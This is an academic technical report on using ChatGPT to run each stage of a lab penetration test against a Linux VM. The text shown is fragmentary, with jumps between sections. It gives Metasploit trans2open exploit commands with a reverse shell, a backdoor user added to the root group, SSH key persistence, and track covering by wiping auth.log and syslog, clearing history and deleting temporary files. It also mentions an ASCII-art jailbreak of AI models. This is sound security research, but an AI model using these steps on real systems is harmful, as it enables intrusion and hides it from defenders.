Ai Enhanced Ethical Hacking
Ai Enhanced Ethical Hacking
Experiment
1 Introduction
various stages of the process. Tools like ChatGPT3 [5] allow ethical hackers
to streamline repetitive tasks, make faster decisions, and reduce the extensive
human input typically required. This not only addresses the time and capacity
limitations faced by operators but also lowers the implementation costs. GenAI’s
ability to analyse data, provide real-time insights, and optimise workflows leads
to more efficient, cost-effective security assessments.
This report presents a comprehensive experimental study evaluating the prac-
tical use of GenAI in a controlled Linux-based virtual environment. By simu-
lating key stages of ethical hacking, such as reconnaissance, scanning, gaining
& maintaining access, and covering tracks, this study demonstrates how GenAI
can enhance these processes and bolster cybersecurity defences. The findings
and observations documented here contribute to the ongoing discussion about
AI-human collaboration in cybersecurity, emphasising the potential of GenAI
to improve efficiency and reduce costs while maintaining the need for expert
oversight.
While previous research has explored the broader role of GenAI in cyberse-
curity, this report specifically examines its application in Linux-based environ-
ments, which are frequently targeted in both penetration testing and real-world
attacks. This work builds on our previously published research, in which we
proposed a conceptual model leveraging the capabilities of GenAI to support
ethical hackers across the five stages of ethical hacking [3]. It also expands on a
proof-of-concept implementation, used to conduct an initial experimental study
on the integration of AI into ethical hacking on target Windows VMs [2].
The remainder of this document is organised as follows. Section 2 explores
GenAI and ChatGPT. Section 3 presents the laboratory setup, and section 4
outlines our methodology. Section 5 details the execution of our experiment.
Section 6 discusses the potential benefits and risks. Section 7 reviews related
work, and, section 8 summarises our conclusions and outlines plans for future
work. Finally, appendix A lists all the figures referenced in this technical report.
not just the structure of language but also its context, essential for generating
human-like text.
Each iteration of ChatGPT has demonstrated enhanced contextual under-
standing and output relevance. Its primary function lies in interpreting user
prompts and generating coherent, contextually appropriate responses. This ver-
satility extends from conducting conversations to performing complex tasks, in-
cluding coding, content creation, and, as we propose in this report, ethical hack-
ing. The GPT model family, including ChatGPT, owes much of its success to the
transformer model, introduced by Vaswani et al. in 2017 [15]. This architecture
revolutionises sequence processing through attention mechanisms, enabling the
model to focus on different parts of the input based on its relevance to the task.
The latest iteration, GPT-4o5 , provides significant advances in speed, multi-
modal capabilities, and overall intelligence. GPT-4o, now available to a broader
user base, including free-tier users, improves upon the GPT-4 model by offering
enhanced performance in understanding and generating text, as well as new ca-
pabilities in processing voice and images. These improvements position GPT-4o
as a powerful tool not only in natural language processing but also in applica-
tions such as real-time communication and data analysis, making it a key asset
in modern cybersecurity practices.
In exploring the intersection of AI and cybersecurity, understanding Chat-
GPT’s foundational aspects is vital. Its generative nature, contextual sensitivity,
and adaptive learning capacity can lead to innovative approaches in cybersecu-
rity practices. Our focus will be on how these qualities of ChatGPT can be
used to support ethical hacking, exploring the technical, ethical, and practical
implications.
3 Laboratory Setup
The experiments used a MacBook Pro with 16 GB RAM, a 2.8 GHz Quad-Core
Intel Core i7 processor, and 1 TB of storage, providing sufficient computational
capabilities for virtualisation (see Figs. 1 and 2).
Virtualisation of the network was achieved using VirtualBox 7 (see Fig. 3),
a reliable tool for creating and managing virtual machine environments. The
virtual setup included the following VMs.
1. Kali Linux VM: this machine functioned as the primary attack platform
for conducting the penetration tests. It is equipped with the necessary tools
and applications for ethical hacking.
2. Windows VM: this machine, running a 64-bit version of Windows Vista
with a memory allocation of 512 MB, was the principal target for penetration
testing within a previously conducted experiment [2].
5
https://openai.com/blog/chatgpt
4 H. Al-Sinani & C. Mitchell
3. Linux VM: this machine, operating on a 64-bit Linux Debian system and
allocated 512 MB of memory, is the primary focus of this report.
The experiment leveraged ChatGPT-46 (a paid version) for its advanced AI ca-
pabilities and efficient response time. The selection of ChatGPT-4 was also based
on its prominent status as a leading GenAI tool, offering cutting-edge technology
to enhance the ethical hacking process. Of course, other GenAI tools are also
available, e.g. Google’s Bard7 and GitHub’s Co-Pilot8 , which could potentially
be used in similar contexts. The methodologies and processes described are ap-
plicable to both the paid and free versions of ChatGPT, with the paid version
chosen for improved performance in this study.
4 Methodology
The experiment followed the structured phases of ethical hacking listed below,
with ChatGPT’s guidance integrated at each step.
5 Execution
We now summarise the experimental procedure for each stage.
5.1 Reconnaissance
There are two main types of reconnaissance (recon).
1. Passive Recon: This entails passive observation without active engage-
ment.
2. Active Recon: Active recon involves engaging with the target to prompt
responses for observation.
The emphasis here is on active reconnaissance; we followed the steps listed
below.
3. We next turned to our the Kali ‘attack’ machine, applying the ChatGPT
recommendations. As a result, we successfully identified the active devices
within the target network, as in Fig. 9.
4. To determine the IP address of the Kali ‘attack’ machine, we used the ‘host-
name’ command with the ‘-I’ option, as shown in Fig. 10.
5. To find potential target machines, the IP addresses of the Kali host, the
standard default gateway, and the DHCP server can be excluded. To sim-
plify this process and avoid the need to remember the relevant commands,
ChatGPT can be consulted for guidance. We first asked ChatGPT for the
commands to display the IP addresses of our Kali machine, the standard
default gateway, and the DHCP server, as shown in Fig. 11. We executed
these commands, as displayed in Fig. 12. We next asked ChatGPT to analyse
the output from the ‘arp-scan’ command, which lists active network nodes,
and the results from displaying the IP addresses for default IP addresses to
identify the role of each IP address, such as Kali machine, DHCP server,
etc. ChatGPT performed this analysis and provided responses in a question-
and-answer format, as shown in Figs. 13 and 14.
6. As a result of the analysis presented above, we identified the VMs with the
IP addresses 192.168.1.6 and 192.168.1.7 as potential targets. This allowed
us to proceed to the second scanning stage.
5.2 Scanning
During this stage, ethical hackers typically use automated tools to scan a target
system or network for vulnerabilities. This can include port scanning, vulner-
ability scanning, etc. In our specific scenario, the system demanding scanning
attention is the Linux machine with IP address: ‘192.168.1.7’.
To initiate this phase, we asked ChatGPT for key commands for gather-
ing comprehensive information about the specific target (192.168.1.7) using our
Kali machine. We informed ChatGPT that the goal was to gather extensive
intelligence on this system in preparation for an attack. As shown in Fig. 15,
ChatGPT provided a concise list of potential scanning commands, including the
use of nmap and its various capabilities. Interestingly, this output is significantly
more comprehensive than that which ChatGPT produced a year previously when
we asked a similar question for a different VM (Windows) [2], demonstrating the
model’s improvement over time.
We further engaged with ChatGPT, requesting a single ‘nmap’ command
that could gather as much information as possible about the target (192.168.1.7),
including scanning all ports and saving the output in all supported ‘nmap’ for-
mats. ChatGPT correctly recommended the command ‘nmap -p- -A -T4 -oA
scan results 192.168.1.7’, providing a detailed breakdown of the command’s op-
tions, as illustrated in Fig. 16. The options in this ‘nmap’ command have the
following effects:
– -T4: sets the timing template to ‘Aggressive’ for faster scanning; and
– -oA scan results: saves the output in all three major ‘nmap’ formats
(.nmap, .xml, and .gnmap) with the base name ‘scan results’.
In this phase, we sought guidance from ChatGPT to gain access to the Linux VM
with the IP address ‘192.168.1.7’ using our Kali attack machine. To streamline
the process, we decided to exploit an SMB-related vulnerability via Metasploit.
The ‘nmap’ scan revealed that the target machine supports SMB version 2,
which is outdated and known to have vulnerabilities. ChatGPT provided a de-
tailed guide on how to use Metasploit to confirm the SMB version, as shown in
Fig. 18, which we followed. We started Metasploit with the command ‘msfcon-
sole’, selected the ‘auxiliary/scanner/smb/smb version’ module, set the target
IP with ‘set RHOSTS 192.168.1.7’, and executed the module with ‘run’. The
Metasploit output confirmed the ‘nmap’ results, indicating that our target in-
deed supports SMB version 2, as shown in Fig. 19.
Following this confirmation, we asked ChatGPT which vulnerability pos-
sessed by Metasploit could be exploited to gain access. As shown in Figs. 20
and 21, ChatGPT recommended the use of the “Samba ‘trans2open’ overflow”
exploit in Metasploit, which is specifically designed to target older versions of
Samba, such as 2.2.1a. ChatGPT also provided step-by-step instructions on how
to exploit this vulnerability using Metasploit.
As shown in Fig. 22, we followed ChatGPT’s instructions to exploit the well-
known trans2open vulnerability. However, when we attempted to run the exploit,
we encountered an error since the payload suggested by ChatGPT was incom-
patible. This demonstrates that, while ChatGPT is a powerful tool, it is not
infallible and can make mistakes. We presented the error directly to ChatGPT
without specifically requesting a solution, and ChatGPT promptly suggested a
fix (see Fig.24). We applied the suggested fix, as shown in Fig. 23, and success-
fully gained root access to the target Linux machine (see Fig. 25).
To summarise, in order to gain access to the target machine (192.168.1.7) us-
ing the ‘trans2open’ exploit via Metasploit, we started Metasploit with ‘msfcon-
sole’, selected the exploit module with ‘use exploit/linux/samba/trans2open’, set
the payload with ‘set payload linux/x86/shell/reverse tcp’, configured the target
IP with ‘set RHOSTS 192.168.1.7’, set the ‘LHOST’ to the attacking machine’s
IP (192.168.1.4), accepted the default ‘LPORT’ of 4444, and then ran the exploit
with ‘run’.
8 H. Al-Sinani & C. Mitchell
Creating a New User. As shown in Fig. 31, we first created a new root
user employing the command ‘useradd -m -s /bin/bash -G root Haitham’.
This command creates a new user named ‘Haitham’, sets up a home directory
at /home/Haitham with the -m option, assigns /bin/bash as the default shell
with the -s option, and includes the user in the root group with the -G op-
tion, thereby granting elevated permissions (see Fig. 35). We further used the
command ‘passwd Haitham’ to set up a new password for the newly added
user (see Fig. 33 and Fig. 34). We verified that the user was indeed added by
checking for a new entry in both the /etc/passwd and /etc/shadow files. We
also confirmed that the user was added to the root group using the command
‘groups Haitham’, and by also reviewing the /etc/sudoers file (see Fig. 36).
Subsequently, we tested this by restarting the Linux target machine and success-
fully confirmed our ability to log in using the newly created user through the
standard Linux login procedure.
Since port 22 is open, we established an SSH session using the newly added
user credentials (see Fig. 37), which provided a more stable shell with double-tab
auto-completion and history features enabled by default. This SSH session can
AI-Enhanced Ethical Hacking 9
1. We first generated an SSH key pair on the Kali machine using ‘ssh-keygen
-t rsa -b 4096’.
2. We next copied the public key to the target machine by executing the com-
mand ‘ssh-copy-id [email protected]’ on our Kali machine.
3. We enabled SSH public-key, password-less authentication on the target ma-
chine by adding ‘PubkeyAuthentication yes’ to the ‘/etc/ssh/sshd config’
file, and then restarted the SSH service with ‘sudo systemctl restart
sshd’.
4. We also ensured correct file permissions on the target machine with the com-
mands: ‘chmod 700 /.ssh && chmod 600 /.ssh/authorized keys’.
5. Finally, we tested the connection from the Kali machine using the command:
‘ssh [email protected]’.
– Clear Command History: Clear the current session’s history and remove
the history file using ‘history -c && history -w’ and ‘rm /.bash history’.
– Disable Future History Logging: Disable history logging for the session
with ‘unset HISTFILE’, ‘export HISTSIZE=0’, and ‘export HISTFILESIZE=0’.
10 H. Al-Sinani & C. Mitchell
– Remove Log Entries: Empty critical log files without deleting them using
‘echo > /var/log/auth.log’, ‘echo > /var/log/syslog’, and ‘echo >
/var/log/secure’.
– Clean SSH Artifacts: Remove the SSH key and check SSH logs for the
hacking activities using ‘rm /.ssh/authorized keys’ and ‘sudo nano
/var/log/auth.log’.
– Delete Temporary Files: Remove temporary files that could reveal the
pen-test activities using ‘rm -rf /tmp/*’ and ‘rm -rf /var/tmp/*’.
– Remove ‘Haitham’ User: Delete the ‘Haitham’ user and the correspond-
ing home directory using ‘userdel -r Haitham’.
– Clear Scheduled Tasks: Remove all cron jobs for the current user with
‘crontab -r’.
– Flush ARP Cache: Clear the ARP cache to remove traces in the network
using ‘ip -s -s neigh flush all’.
– Reset Terminal and Exit: Clear the terminal screen and exit the shell
cleanly using ‘reset’ and ‘exit’.
Using shred for Secure File Deletion. In response to our question (see
Figs. 45 and 46), ChatGPT explained that shred is a command-line utility in
Linux used to securely delete files by overwriting their contents with random
data multiple times, making it extremely difficult to recover the original data.
The command ‘shred -uvfz -n 5 old authorized keys’ operates as follows:
In this example, the command securely deletes the file old authorized keys
by overwriting it five times with random data, adding a final overwrite with
zeros, showing progress, forcing the operation even if the file is read-only, and
then deleting the file.
Finally, while we implemented some of these recommendations, it is worth
noting ChatGPT’s advice that clearing logs can raise suspicion in real-world
scenarios and might not always be advisable.
7 Related Work
The intersection of AI and cybersecurity is a highly active area of research, with
studies ranging from AI’s role in detecting intrusions to aiding in offensive se-
curity including ethical hacking. The rise of sophisticated language models like
GPT-3, introduced by Brown et al. [5], has expanded research possibilities by en-
abling strong performance on various tasks, including of course cybersecurity as
we show in this report. Handa et al. [9] review the application of machine learning
in cybersecurity, emphasizing its role in areas like zero-day malware detection
and anomaly-based intrusion detection, while also addressing the challenge of
adversarial attacks on these algorithms. Other studies, including that by Gupta
et al. [8], examine the dual role of GenAI models like ChatGPT in cybersecurity
and privacy, highlighting both their potential for malicious use in attacks such
as social engineering and automated hacking, and their application in enhancing
cyber defense measures.
Moreover, Large Language Models (LLMs), a form of GenAI, are being ap-
plied across various domains, including cybersecurity. For example, they are
used to fix vulnerable code [13] and identify the root causes of incidents in cloud
environments [1]. In addition, various LLM-based tools have been recently de-
veloped, such as Code Insight9 by VirusTotal, which analyses and explains the
functionality of malware written in PowerShell. Furthermore, tools for vulnera-
bility scanning10 and penetration testing11 [6] have also emerged lately.
A recent practical study by Harrison et al. [10] shows how advances in AI’s
deep learning algorithms can be used to enhance acoustic side-channel attacks
against keyboards, achieving impressive keystroke classification accuracy via
common devices like smartphones and Zoom. This development poses a sig-
nificant threat, potentially enabling the theft of sensitive information such as
9
https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.
html
10
https://github.com/aress31/burpgpt
11
https://github.com/GreyDGL/PentestGPT
14 H. Al-Sinani & C. Mitchell
passwords and PINs from devices without needing physical access to the vic-
tim’s machine. A recent panel discussion, [4], also highlighted the dual role of
AI in enhancing cybersecurity while addressing the rising threat of adversarial
attacks that exploit AI system vulnerabilities.
Recent research has also identified new vulnerabilities in the security mech-
anisms of LLMs. Jiang et al. [11] introduced ‘ArtPrompt’, an innovative ASCII
art-based jailbreak attack that exploits the inability of LLMs to recognise
prompts encoded in ASCII art. This work underscores the need for further
research into the robustness of AI models, particularly as these vulnerabilities
can bypass safety measures and induce undesired behaviors in state-of-the-art
LLMs such as GPT-4 and Claude.
Park et al. [12] introduce a technique for automating the reproduction of 1-
day vulnerabilities using LLMs. Their approach involves a three-stage prompting
system, guiding LLMs through vulnerability analysis, identifying relevant in-
put fields, and generating bug-triggering inputs for use in directed fuzzing. The
method, tested on real-world programs, showed some improvements in fuzzing
performance compared to traditional methods. This research demonstrates the
potential of LLMs to enhance cybersecurity processes, particularly in automating
complex tasks such as vulnerability reproduction.
Fujii and Yamagishi [7] explore the use of LLMs to support static malware
analysis, demonstrating that LLMs can achieve practical accuracy. A user study
was conducted to assess their utility and identify areas for future improvement.
Our experimental research work seeks to expand on these discussions, explor-
ing ChatGPT’s role across all stages of ethical hacking — a topic that remains
under-explored in the existing literature. We aim to provide a comprehensive
framework for integrating generative language models into ethical hacking, evi-
dencing AI’s multifaceted role in cybersecurity. We have also sought to empiri-
cally validate claims and assertions regarding the capabilities of ChatGPT in the
ethical hacking domain through a series of controlled, research-driven, lab-based
experiments.
References
1. Ahmed, T., Ghosh, S., Bansal, C., Zimmermann, T., Zhang, X., Rajmohan, S.:
Recommending root-cause and mitigation steps for cloud incidents using large
language models. In: Proceedings of 2023 IEEE/ACM 45th International Con-
ference on Software Engineering (ICSE). pp. 1737–1749. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10172904/
2. Al-Sinani, H., Mitchell, C.: Unleashing AI in ethical hacking: A prelimi-
nary experimental study. Technical report, Royal Holloway, University of Lon-
don (2024), https://pure.royalholloway.ac.uk/files/58692091/TechReport_
UnleashingAIinEthicalHacking.pdf
3. Al-Sinani, H.S., Mitchell, C.J., Sahli, N., Al-Siyabi, M.: Unleashing AI in ethical
hacking. In: Proceedings of the STM 2024, the 20th International Workshop on
Security and Trust Management (co-located with ESORICS 2024), Bydgoszcz,
Poland. p. to appear. LNCS, Springer (2024), https://www.chrismitchell.net/
Papers/uaieh.pdf
4. Bertino, E., Kantarcioglu, M., Akcora, C.G., Samtani, S., Mittal, S., Gupta,
M.: AI for security and security for AI. In: Joshi, A., Carminati, B., Verma,
12
https://owasp.org/www-project-top-ten/
13
https://owasp.org/www-project-mobile-top-10/
16 H. Al-Sinani & C. Mitchell
R.M. (eds.) CODASPY ’21: Eleventh ACM Conference on Data and Applica-
tion Security and Privacy, Virtual Event, USA, April 26–28, 2021. pp. 333–
334. ACM (2021). https://doi.org/10.1145/3422337.3450357, https://doi.
org/10.1145/3422337.3450357
5. Brown, T.B., et al.: Language models are few-shot learners. In: Larochelle,
H., Ranzato, M., Hadsell, R., Balcan, M., Lin, H. (eds.) Advances in
Neural Information Processing Systems 33: Annual Conference on Neu-
ral Information Processing Systems 2020, NeurIPS 2020, December 6–
12, 2020, virtual (2020), https://proceedings.neurips.cc/paper/2020/hash/
1457c0d6bfcb4967418bfb8ac142f64a-Abstract.html
6. Deng, G., Liu, Y., Mayoral-Vilches, V., Liu, P., Li, Y., Xu, Y., Zhang, T., Liu, Y.,
Pinzger, M., Rass, S.: PentestGPT: An LLM-empowered automatic penetration
testing tool (2023), https://arxiv.org/abs/2308.06782
7. Fujii, S., Yamagishi, R.: Feasibility study for supporting static malware analy-
sis using LLM. In: Proceedings of the SecAI 2024, the Workshop on Security
and Artificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland.
p. to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14EW8RJnE4QUBG0mIoMVM0chzJcp1nQon/view
8. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From ChatGPT to
ThreatGPT: Impact of generative AI in cybersecurity and privacy. IEEE Ac-
cess 11, 80218–80245 (2023). https://doi.org/10.1109/ACCESS.2023.3300381,
https://doi.org/10.1109/ACCESS.2023.3300381
9. Handa, A., Sharma, A., Shukla, S.K.: Machine learning in cybersecurity: A review.
WIREs Data Mining and Knowledge Discovery 9(4), e1306 (2019). https://doi.
org/10.1002/WIDM.1306, https://doi.org/10.1002/widm.1306
10. Harrison, J., Toreini, E., Mehrnezhad, M.: A practical deep learning-based acoustic
side channel attack on keyboards. In: IEEE European Symposium on Security and
Privacy, EuroS&P 2023 — Workshops, Delft, Netherlands, July 3-7, 2023. pp. 270–
280. IEEE (2023). https://doi.org/10.1109/EUROSPW59978.2023.00034, https:
//doi.org/10.1109/EuroSPW59978.2023.00034
11. Jiang, F., Xu, Z., Niu, L., Xiang, Z., Ramasubramanian, B., Li, B., Poovendran,
R.: ArtPrompt: ASCII art-based jailbreak attacks against aligned llms. Tech.
rep. (2024). https://doi.org/10.48550/ARXIV.2402.11753, https://doi.org/
10.48550/arXiv.2402.11753
12. Park, S., Lee, H., Cha, S.K.: Systematic bug reproduction with large language
model. In: Proceedings of the SecAI 2024, the Workshop on Security and Ar-
tificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland. p.
to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14dafpfhAnp9YLb9YIC4YbVJKwTPc_dQ3/view
13. Pearce, H., Tan, B., Ahmad, B., Karri, R., Dolan-Gavitt, B.: Examining zero-shot
vulnerability repair with large language models. In: Proceedings of 2023 IEEE
Symposium on Security and Privacy (SP). pp. 2339–2356. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10179324
14. Swanson, M., Bartol, N., Sabato, J., Hash, J., Graffo, L.: Technical guide to
information security testing and assessment (NIST SP 800-115). Special Publi-
cation 800-115, National Institute of Standards and Technology (2008), https:
//csrc.nist.gov/publications/detail/sp/800-115/final
15. Vaswani, A., Shazeer, N., Parmar, N., Uszkoreit, J., Jones, L., Gomez, A.N., Kaiser,
L., Polosukhin, I.: Attention is all you need. In: Guyon, I., von Luxburg, U.,
Bengio, S., Wallach, H.M., Fergus, R., Vishwanathan, S.V.N., Garnett, R. (eds.)
AI-Enhanced Ethical Hacking 17
A Appendix
Fig. 8. Reconnaissance
Fig. 11. Requesting ChatGPT to suggest commands for displaying default IP addresses
24 H. Al-Sinani & C. Mitchell
Fig. 40. Corrected ChatGPT response for enabling public key authentication
AI-Enhanced Ethical Hacking 45
Fig. 49. Request to ChatGPT for a PenTest report draft based on provided details
AI-Enhanced Ethical Hacking 53